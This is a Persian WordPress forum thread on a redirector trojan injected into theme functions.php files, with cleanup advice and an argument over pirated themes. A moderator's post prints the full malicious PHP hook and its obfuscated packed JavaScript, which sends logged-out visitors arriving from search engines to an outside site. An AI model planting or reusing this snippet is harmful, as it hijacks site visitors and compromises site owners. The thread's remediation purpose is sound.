وجود ویروس در قالب « انجمن وردپرس فارسی

MyParsi.com

آفلاین
عضو
تعداد نوشته‌ها: ۱۴۹
تشکر شده: ۷۶ بار
# نوشته شده: ۱۲ سال پیش
۱۱ فروردین ۱۳۹۱ - ۱۹:۴۲

سلام دوستان
مدتیه که در قالبهای وردپرس ویروسی از نوع تروجان وجود داره که باعث ایجاد مشکلاتی در سایت ها میشه
محتوای مخرب این ویروس به صورت یکسری کد به فایل function.php اضافه میشه که با حذف این کد سایت از دید نرم افزارهای ویروس یاب مشکلی نخواهد داشت ولی با وجود این کد در قالب سایت هنگامی که بخواید سایت رو باز کنید آنتی ویروس های NOD32 و یا Avast و... سایت رو دارای ویروس می بینن و اجازه باز شدن سایت رو نمیدن

وقتی کدها رو از از فایل function.php حذف می کنم خروجی فید سایت باز نمیشه: http://myparsi.com/feed/rss
همچنین پس از 24 ساعت از حذف فایل دسترسی به داشبورد هم از بین میره؛ یعنی با صفحه سفید برخورد میکنم
البته برای رفع این دو مشکل یه راه حل هست؛ و اون اضافه کردن کدهای مربوط به ویروس به فایل function.php هستش!!

از اساتید وردپرس ممنون میشم برای این مشکل راهکاری ارائه بدن
الان ما باید بین دو حالت زیر یکی رو انتخاب کنیم
1- دسترسی به داشبورد و باز شدن فید مخصوصا برای گوگل در ازای ویروسی بودن
2- عدم دسترسی به موارد گفته شده در ازای ویروسی نبودن

ویروس ذکر شده Trojan.JS.Redirector.ux هستش
مرتضی نظری

آفلاین
عضو
تعداد نوشته‌ها: ۵۱۳
تشکر شده: ۳۴۵ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۰۰:۵۸

چقدر جالبه.الان چندجا فقط همين تروجان مطرح شده!
از جوابم كاملا مطمعن نيستم.اما توي اين تايپيك چندتا افزونه معرفي كردم اما نميدونم مشكلتون حل ميشه/نه.
http://forum.wp-persian.com/topic/20928
در ضمن به نظر من كه زشته از نال شده ها استفاده بشه...

يك جمله هم از مولا علي (ع) ميگم خيلي مفيد هست: " وجود يك اجري كه بدون رضايت صاحبش توي ساختن يك خونه استفاده بشه,باعث تخريب خانه ميشود."

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
ثاني عشر
MyParsi.com

آفلاین
عضو
تعداد نوشته‌ها: ۱۴۹
تشکر شده: ۷۶ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۰۱:۲۲

i-engs گفت:

در ضمن به نظر من كه زشته از نال شده ها استفاده بشه...

دوست عزیز اگر منظورتون قالبیه که الان دارم استفاده می کنم باید بگم که فقط برای حل مشکل مجبور شدم ازش استفاده کنم وگرنه من قالب هام رو برای خودم اختصاصی می سازم
توی همین انجمن یه مدت دوستانی که مشکل داشتند رو کمک می کردم... حتی قدمت کاربری بنده بیشتر از شماست

به نظر من زشتتر اینه که به این صراحت حرفتون رو بزنید!!

یه سرچ کنید در گوگل؛ قالب پارسی من

قالب قبلی من که اختصاصی بود و خود بنده اون رو طراحی کردم توی اینترنت ریپ شده و ملت دارن استفاده می برن!!
مرتضی نظری

آفلاین
عضو
تعداد نوشته‌ها: ۵۱۳
تشکر شده: ۳۴۵ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۰۱:۴۴

مگه من گفتم من بيشتر قدمت دارم?اصلا شما پدر بزرگ بنده.خيالتون راحت جاتون براي خودتون هست...

راستي سه نكته:
كسي رو تو قبر كسه ديگه نميزارن.

استفاده از نال شده چه به صورت ضروري چه به صورت تفريحي چه به صورت... دزدي هست.دزدي هم كار زشتي هست...بهتونم بر نخوره,چون خودتون هم ميدونيد...

ادم صريح و رو راستي هستم,و اينو هيچ عيبي نميدونم كه اونو زشت بدونم.كسي چيزيرو زشت ميدونه كه مخالف اون باشه...
MyParsi.com

آفلاین
عضو
تعداد نوشته‌ها: ۱۴۹
تشکر شده: ۷۶ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۰۲:۰۶

اولا که من از نال بودن این قالب خبر نداشتم
ثانیا این قالب رو به خاطر اینکه ازش یه الگو برای طراحی داشته باشم توی هاست داشتم و تنها قالبی بود که ویروس نداشت. به همین خاطر مجبور به استفاده از اون شدم. و البته مجبور شدن رو کسانی مثل شما بعید میدونم درک کنند
بنده الان حتی به مدیریت وردپرسم دسترسی ندارم که بتونم مشکلم رو حل کنم پس اسمش دزدی نیست! حداقل تا رفع مشکلم...
ثالثا بعید میدونم شما در حدی باشید که با من اینطوری حرف بزنید پس لطفا احترام خودتون رو نگه دارید آقای نسبتا محترم!
----------------------------------------------------------------------------------------
البته من معمولا در جواب افرادی مثل شما میگم که... کافر همه را به کیش خود پندارد
از تیم مدیریت وردپرس فارسی هم انتظار دیگه ای میره در برخورد با...

متاسفم
مرتضی نظری

آفلاین
عضو
تعداد نوشته‌ها: ۵۱۳
تشکر شده: ۳۴۵ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۱۱:۲۴

چقدر جالبه...
بهترين جواب الان خاموشي هست...
---------
كاري به مسائل پيش اومده ندارم.اما براي ورود به پيشخوان,فعلا يك قالب ديگه پيدا كنيد و از طريغ پي اچ پي ماي ادمين پوسته رو عوض كنيد.هم يك تنوعي واسه كاربراتون ايجاد ميشه.هم مطلب به سايت ميفرستيد.براي يك سايت خوب نيست كه مطالبش كهنه بشه.حتما بروز كنيد...
از دست من ديگه بيشتر ازين كمكي بر نمياد.موفق باشيد.

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
ثاني عشر
Saeed Fard

آفلاین
ناظم
تعداد نوشته‌ها: ۹۸۲
تشکر شده: ۱۶۱۵ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۱۵:۵۷

درود ;

اصلا در شأن کاربران وردپرس ، به خصوص قدیمیتر ها ، این بحث های بچه گونه نیست ،، لطفا ادامه ندید این حرف های بچه گونه رو چون اجبارا تاپیک قفل خواهد شد ..

در رابطه با مشکل شما دوست عزیز ، شما از طریق هاستتون تمامی پوسته های داخل پوشه ی themes رو پاک کنید ، بعد تمامی فایل های وردپرس ( به غیر از فایل های ضروری که باید بدونید ) به همراه پوشه ی themes تماما از نو بارگزاری کنید ، حالا وارد پنل وردپرس میتونید بشید ، داخل بشید و پوسته ی مورد نظرتون رو نصب کنید ، فقط دقت کنید که ویروس قبلی در پوسته وجود نداشته باشه و تمام ،،

برای اطمینان خاطر و اینکه دیگه خیالتون از ویروس راحت بشه هم بهتره دوباره از پنله وردپرس قسمت بروزرسانی ها وردپرس رو ار نو راه اندازی کنید ..

موفق باشید ../.

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
ثاني عشر
مرتضی نظری

آفلاین
عضو
تعداد نوشته‌ها: ۵۱۳
تشکر شده: ۳۴۵ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۱۶:۲۸

اصلا در شأن کاربران وردپرس ، به خصوص قدیمیتر ها ، این بحث های بچه گونه نیست

اتفاقا منم پی به اشتباهم بردم و سکوت کردم... ممنون سعید جان

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
Saeed Fard - ثاني عشر
Saeed Fard

آفلاین
ناظم
تعداد نوشته‌ها: ۹۸۲
تشکر شده: ۱۶۱۵ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۱۶:۵۳

یه چیزه دیگه ،، دوست عزیز MyParsi شما توی سایتتون از اسکریپت های رفرش استفاده میکنید ؟؟ تمامی صفحاتتون هر چند ثانیه 1 بار رفرش میشه .. گفتم بگم که اگه استفاده میکنید ، اگه گوگل متوجه بشه عواقب بدی واستون خواهد داشت ..

موفق باشید ../.

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
Online98
Online98

آفلاین
عضو
تعداد نوشته‌ها: ۷۹
تشکر شده: ۷۶ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۱۸:۲۰

سلام
خسته نباشید
دوستان ساایت من هم ویروسی شده
بازدیدم هم نصف !!!! Accsess Denideمیاد و سایت رو بلاک میکنه
ویروس توسط کسپر اسکی و نود 32 شناسایی میشه
تروجانه
چکار کنیم؟
خیلی ممنون

این کد رو از انتهای فایل functions.php پاک کنید ،،

<?php
add_action('get_footer', 'add_sscounter');
	function add_sscounter(){
		echo '<!--scounter-->';
		if(function_exists('is_user_logged_in')){
			if(time()%2 == 0 && !is_user_logged_in()){
				echo "<script language=\"JavaScript\">eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\\b'+e(c)+'\\\b','g'),k[c]);return p}('e r=x.9,t=\"\",q;4(r.3(\"m.\")!=-1)t=\"q\";4(r.3(\"7.\")!=-1)t=\"q\";4(r.3(\"8.\")!=-1)t=\"p\";4(r.3(\"a.\")!=-1)t=\"q\";4(r.3(\"f.\")!=-1)t=\"g\";4(r.3(\"j.\")!=-1)t=\"q\";4(t.6&&((q=r.3(\"?\"+t+\"=\"))!=-1||(q=r.3(\"&\"+t+\"=\"))!=-1))B.C=\"v\"+\"w\"+\":/\"+\"/A\"+\"b\"+\"k\"+\"5\"+\"h.\"+\"c\"+\"z/s\"+\"u\"+\"5\"+\"h.p\"+\"d?\"+\"t\"+\"y=1&t\"+\"i\"+\"l=\"+r.n(q+2+t.6).o(\"&\")[0];',39,39,'|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location'.split('|'),0,{}))</script>";
			}
		}
	}
?>

و بعد از قسمت بروزرسانی ها در پنل وردپرس ، وردپرس رو از نو راه اندازی کنید و تمام ..

موفق باشید ../.

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
Online98 - asaleardabil - himech - namakpash - arhsarvestani - ثاني عشر

مرتضی نظری

آفلاین
عضو
تعداد نوشته‌ها: ۵۱۳
تشکر شده: ۳۴۵ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۱۸:۳۸

راستی سعید جان این تروجان چیکار میکنه؟

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
Online98 - himech
Saeed Fard

آفلاین
ناظم
تعداد نوشته‌ها: ۹۸۲
تشکر شده: ۱۶۱۵ بار
# نوشته شده: ۱۲ سال پیش
۱۲ فروردین ۱۳۹۱ - ۱۹:۲۴

راستی سعید جان این تروجان چیکار میکنه؟

تروجان دایرکتور هستش که کاره خاصی انجام نمیداده ، قسمت ابتدایی کد که php هستش که اضافه میکنه کد  رو به فوتر قالب و بعدش هم اسکریپت ویروس اضافه میشه ، ویروس تنها تیکه ای هست که چاپ میکنه کد <script language=\... رو ،

تنها نکته ی قابل توجه این بوده که اگه تروجان تا 2 هفته روی سایتی باشه اون سایت توسط گوگل اسپم شناخته میشه و باید قید سایت رو زد دیگه ،،

موفق باشید ../.

کاربران زیر به‌خاطر این نوشته تشکر کرده‌اند:
مرتضی نظری - asaleardabil - AliReza CH - himech
turnado

آفلاین
عضو
تعداد نوشته‌ها: ۵
# نوشته شده: ۱۲ سال پیش
۴ اردیبهشت ۱۳۹۱ - ۱۳:۲۵

سلام
من 2-3 هفته پیش تمام سایتم رو پاک کردم وورد پرس رو دوباره نصب کردم و همه پلاگیم ها رو هم از مخزن وورد پرس گرفتم اما باز هم مشکل دارم.
نمیدونم کجای سایت کدی هست که ییهو یک صفحه باز میشه که فیلتر هم هست هر چی هم میگردم نمیدونم چه صفحه ای هست. ممکنه 1 ساعت هم نشه ولی یهو 5-6 تا صفحه باز میشه.
تمام برنامه های امنیتی که تو این فروم گفته شده نصب کردم هیچ کدوم چیزی پیدا نمیکنه
جالبه که انتی ویروس هم چیزی نمیتونه پیدا کنه
اما به شدت ایندکس سایت تو گوگل پایین اومده و میگه یک صفحه ریدایرکت میشه و هر دفعه هم از یک صفحه دیگه ارور میگیره
چی کار کنم دیوانه شدم....
turnado

آفلاین
عضو
تعداد نوشته‌ها: ۵
# نوشته شده: ۱۲ سال پیش
۸ اردیبهشت ۱۳۹۱ - ۱۸:۱۸

هیچ کس نیست یک راهنمایی بکنه؟

وردپرس فارسی

انجمن

وجود ویروس در قالب (۱۵ نوشته)

درباره‌ی این موضوع

برچسب‌ها